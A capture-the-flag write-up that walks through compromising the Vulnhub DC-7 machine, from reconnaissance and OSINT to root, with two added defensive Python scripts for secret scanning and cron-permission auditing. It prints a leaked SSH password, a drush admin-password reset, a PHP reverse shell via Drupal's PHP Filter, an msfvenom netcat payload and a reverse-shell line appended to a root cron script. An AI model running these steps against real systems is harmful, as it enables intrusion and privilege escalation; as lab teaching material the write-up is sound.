Vulnhub: DC-7 – CTF

Hello Cyberman!

This article is about a CTF (Capture The Flag). The vulnerable machine is named “DC-7”.

This CTF is level 1. The machine runs Debian as its OS.

If you want to download it, please click here.

This machine is very different from the other machines, because solving it requires OSINT.
If you ask “What is OSINT?”:
If you’ve heard the name but are wondering what it means, OSINT stands for open source intelligence, which refers to any information that can legally be gathered from free, public sources about an individual or organization. In practice, that tends to mean information found on the internet, but technically any public information falls into the category of OSINT whether it’s books or reports in a public library, articles in a newspaper or statements in a press release.

OSINT also includes information that can be found in different types of media, too. Though we typically think of it as being text-based, information in images, videos, webinars, public speeches and conferences all fall under the term. (Source of the “What is OSINT” definition: if you want to learn more about OSINT, please click here.)

Are you ready? OK, let’s start! First, I installed the machine. Then I found the machine’s IP address.

$ nmap 192.168.1.0/24

I entered the above command in a terminal on Kali Linux and found the machine. Then I opened this IP address in Firefox.

I came across a website as seen in the picture above.

This website is built with the Drupal CMS.
If you ask “What is Drupal?”: Drupal is a CMS like WordPress, Joomla, etc.

OK, first I scanned this machine with the “enum4linux” tool.

I entered the following in the terminal:

$ enum4linux 192.168.1.110


But it didn’t return much data. That’s sad. OK, I did a more detailed scan with the nmap tool. I ran the command below:

$ nmap 192.168.1.110 -Pn -sA -sV -A

But I couldn’t get enough results.

OK, I tried a brute-force attack with the Python script in this article. But it didn’t work, because this page is protected against brute-force attacks.

I tried scanning with Nikto, but got poor results. The result is shown below:

Then I looked through the directories one by one. That didn’t work.

Finally, I tried SQL injection. That didn’t work either. I saved the POST request below to a file.

POST /user/login HTTP/1.1
Host: 192.168.1.110
Content-Length: 119
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.110
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.110/user/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

name=DC7USER&pass=pass&form_build_id=form-NQgZMwS2t3GPkCbmpOPJFffBqen9aBDHAyBT5quNiO4&form_id=user_login_form&op=Log+in

Then I used sqlmap. I entered the command below:

$ sqlmap -r post.txt 

As a last resort, I searched on Google and found a Twitter account.

This account is like the picture below:

As you can see, this profile has a GitHub account URL. I clicked it.

The GitHub account looks like the picture below:

This GitHub account has a repository named Staffdb. The repository contains the file config.php. A config.php file usually holds information such as database connection details.
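The lesson of this step is that a config.php pushed to a public repository leaks credentials. As an added example (not code from this write-up, the DC-7 machine or the Staffdb repository), the following Python script scans files for hard-coded password-like assignments so such a file is caught before it is committed. The sample config.php it scans is constructed, and the identifier patterns and placeholder list are my own assumptions.

```python
"""Scan source files for hard-coded credentials like those in a committed
config.php.  This is an added example for this write-up, not code from the
DC-7 machine or from the Staffdb repository; the sample config.php below is
constructed and does not reproduce the repository's contents."""
import re
from pathlib import Path

# Identifier fragments that suggest a secret is being assigned (assumption).
SECRET_NAME = r"(?:pass(?:word|wd)?|secret|token|api_?key|db_?pass\w*)"

# PHP variable assignments and define() calls with a string literal value.
PATTERNS = [
    re.compile(rf"\$(\w*{SECRET_NAME}\w*)\s*=\s*['\"]([^'\"]+)['\"]", re.I),
    re.compile(
        rf"define\(\s*['\"](\w*{SECRET_NAME}\w*)['\"]\s*,\s*['\"]([^'\"]+)['\"]",
        re.I,
    ),
]

# Values that are obviously placeholders rather than real secrets.
PLACEHOLDERS = {"", "changeme", "password", "xxx", "<password>", "your_password"}

# File types worth scanning (kept short for the example).
SCAN_SUFFIXES = {".php", ".py", ".env", ".ini", ".yml", ".yaml", ".json"}


def mask(value):
    """Keep only a hint of the value so the report does not re-leak the secret."""
    return value[:2] + "*" * max(len(value) - 2, 3)


def scan_text(text, filename="<string>"):
    """Return a list of findings for one file's contents."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for pattern in PATTERNS:
            for match in pattern.finditer(line):
                name, value = match.group(1), match.group(2)
                if value.strip().lower() in PLACEHOLDERS:
                    continue
                findings.append(
                    {"file": filename, "line": lineno, "name": name, "value": mask(value)}
                )
    return findings


def scan_path(root):
    """Walk a directory (e.g. a cloned repository) and scan matching files."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in SCAN_SUFFIXES:
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue
            findings.extend(scan_text(text, str(path)))
    return findings


# Constructed sample: the shape of a config.php that connects to MySQL.
SAMPLE_CONFIG_PHP = """<?php
// constructed sample, not the Staffdb config.php
$servername = "localhost";
$username = "dbuser";
$password = "hunter2-example";
$dbname = "Staff";
define('DB_PASS', 'changeme');
$conn = mysqli_connect($servername, $username, $password, $dbname);
"""

if __name__ == "__main__":
    # Scan the constructed sample; use scan_path("path/to/repo") for a checkout.
    for f in scan_text(SAMPLE_CONFIG_PHP, "config.php"):
        print(f"{f['file']}:{f['line']}: {f['name']} = {f['value']}")
```

Run it as a pre-commit hook with scan_path on the working tree and fail the commit on any finding; the placeholder define() line is ignored, while the real-looking $password assignment on line 5 is reported with its value masked.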

I tried connecting to MySQL with the above info, but it didn’t work.

Finally, I tried the SSH service. And it worked! I got a shell on the system.

I used this command to log in:

$ ssh dc7user@192.168.1.110

I entered the password: MdR3xOgB7#dW

Now I was in.

First I entered the “ls” command in the terminal. As a result, I saw a file named “mbox”. Then I entered “cat mbox” in the terminal to read the mbox file. I got the result below.

I paid attention to the subject line: “Subject: Cron /opt/scripts/backups.sh”. OK, this time I read the “backups.sh” file.

$ cat /opt/scripts/backups.sh

The result is below:

There is a wonderful clue: “drush”.
This system uses drush (Drupal Shell). What is drush?
Drush, aka The Drupal Shell, is a command line utility and UNIX scripting interface for Drupal. It allows access to common Drupal features and tasks via the command line. It can help speed up common tasks for Drupal site builders, developers, and DevOps teams. Among other things, it makes it easier to integrate Drupal into CI/CD workflows. (For the source and more, click here.)

OK, so I used drush to change the admin password. I changed directory to “/var/www/html” with “cd” in the terminal, then entered the command below:

$ drush user-password admin --password="s4m"

Now I had changed the admin user’s password. I went to the login page.
User: admin
Password: s4m

Now I was logged into the Drupal admin panel as the admin user.

OK, I need a reverse shell. Drupal runs on PHP, so I need a PHP reverse shell script.
I searched for the PHP code on Google. The code is here: GitHub PHP Reverse Shell.

I searched more about Drupal on Google and found an extension named PHP Filter.
The description of this module is as follows:
Allows embedded PHP code/snippets to be evaluated. Enabling this can cause security and performance issues as it allows users to execute PHP code on your site.
Machine name: php
Version: 8.x-1.0
Requires: FilterUserSystem

I can run PHP code on the page with this extension.

I installed it as shown in the picture above. Install from a URL: https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

The installation is shown in the picture above. Now I create new content containing the reverse shell code.

I edited the PHP reverse shell code.
My Kali Linux machine’s IP address: 192.168.1.138
The port number I use: 9001

Then I listened for the connection with the netcat tool by entering this command in the terminal:

$ nc -lvp 9001

Then I went to the add content page, set the text format to “PHP Code”, and clicked “Preview”.
As seen in the picture below:

Finally! I got a shell as the www-data user. If you ask “What is the www-data user?”, in summary: www-data is the user that web servers on Ubuntu (Apache, nginx, for example) use by default for normal operation. The web server process can access any file that www-data can access.

The incoming connection looks like the picture below.

Now I need to use backups.sh to become root, because the www-data user has permission to add extra commands to the “backups.sh” file. First I need bash. To get it, I entered this command in the terminal:

$ python -c 'import pty;pty.spawn("/bin/bash")'
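The root cause exploited in this step is a script run by cron that a less-privileged user (here www-data) can write to. As an added example, not code from this write-up or the DC-7 machine, the following Python audit parses an /etc/crontab-style file and reports scripts that are group- or world-writable, or that sit in a writable directory where the file could be replaced. The crontab lines and file modes it checks are constructed, not the machine’s real ones, and the 0777 mode shown for backups.sh is an assumption for illustration.

```python
"""Audit cron jobs for scripts that a less-privileged user could modify.
Added example for this write-up, not code from the DC-7 machine; the
crontab text and file modes below are constructed."""
import os
import re
import shlex
import stat

WRITABLE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH

# /etc/crontab style line: five schedule fields, a user, then the command.
SYSTEM_CRON = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")


def parse_system_crontab(text):
    """Return (user, command) pairs from /etc/crontab style text.

    Comments, blank lines and VAR=value lines are skipped; @reboot-style
    shortcuts are not handled in this example."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        match = SYSTEM_CRON.match(line)
        if match:
            entries.append((match.group("user"), match.group("cmd")))
    return entries


def script_paths(command):
    """Absolute paths in a cron command: the script itself plus any absolute
    arguments, which are cheap to check as well."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        tokens = command.split()
    return [t for t in tokens if t.startswith("/")]


def default_mode_of(path):
    """Permission bits of a real file, or None if it does not exist."""
    try:
        return stat.S_IMODE(os.stat(path).st_mode)
    except OSError:
        return None


def audit(crontab_text, mode_of=default_mode_of):
    """List cron-run scripts that are group/world writable, or that live in a
    group/world writable directory without the sticky bit (so the file can be
    replaced).  mode_of is injectable so the check can run on constructed data."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        for path in script_paths(command):
            mode = mode_of(path)
            if mode is None:
                continue
            if mode & WRITABLE_BY_OTHERS:
                findings.append({"user": user, "path": path, "mode": oct(mode),
                                 "reason": "script is group/world writable"})
                continue
            parent_mode = mode_of(os.path.dirname(path))
            if (parent_mode is not None and parent_mode & WRITABLE_BY_OTHERS
                    and not parent_mode & stat.S_ISVTX):
                findings.append({"user": user, "path": path, "mode": oct(parent_mode),
                                 "reason": "parent directory is writable; script can be replaced"})
    return findings


# Constructed sample data (not the DC-7 machine's real crontab or modes).
SAMPLE_CRONTAB = """# constructed /etc/crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/15 * * * * root /opt/scripts/backups.sh
0 3 * * * root /usr/local/bin/rotate-logs.sh --keep 7
"""
SAMPLE_MODES = {
    "/opt/scripts": 0o755,
    "/opt/scripts/backups.sh": 0o777,        # rwxrwxrwx: any user can edit it (assumed)
    "/usr/local/bin": 0o755,
    "/usr/local/bin/rotate-logs.sh": 0o755,  # only the owner can write
}

if __name__ == "__main__":
    # Runs against the constructed data; on a real host use
    # audit(open("/etc/crontab").read()) with the default mode_of.
    for f in audit(SAMPLE_CRONTAB, mode_of=SAMPLE_MODES.get):
        print(f"{f['user']} runs {f['path']} ({f['mode']}): {f['reason']}")
```

On a real host, run it against /etc/crontab, the files in /etc/cron.d and each user’s crontab; the fix for a hit is to make the script and its directory writable by the owner only, or to have the job run as the low-privilege user rather than root.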

As seen in the picture below:

OK, now I need the msfvenom tool. (If you don’t know msfvenom, please review this article.) I used it to open a new reverse shell, entering the command below in the Kali Linux terminal:

$ msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.138 lport=9003 R

Yep! The new payload is ready. The part highlighted in white is our new payload. Now I open a new listener terminal in Kali Linux and enter this command:

$ nc -lvp 9003

Then I go back to the first listener terminal (port 9001). First I change to “/opt/scripts”, then enter the command below:

$ echo "mkfifo /tmp/knfqht; nc 192.168.1.138 9003 0/tmp/knfqht 2>&1; rm /tmp/knfqht" >>backups.sh

If you don’t know the “echo” command and the “>>” operator, please review these articles: “What is echo?”, “What is ‘>>’?”

As seen in the picture above, I ran the “backups.sh” file with “./”. And finally!

I became root.

I captured the flag.

Have a nice day with lots of informatics. 🙂
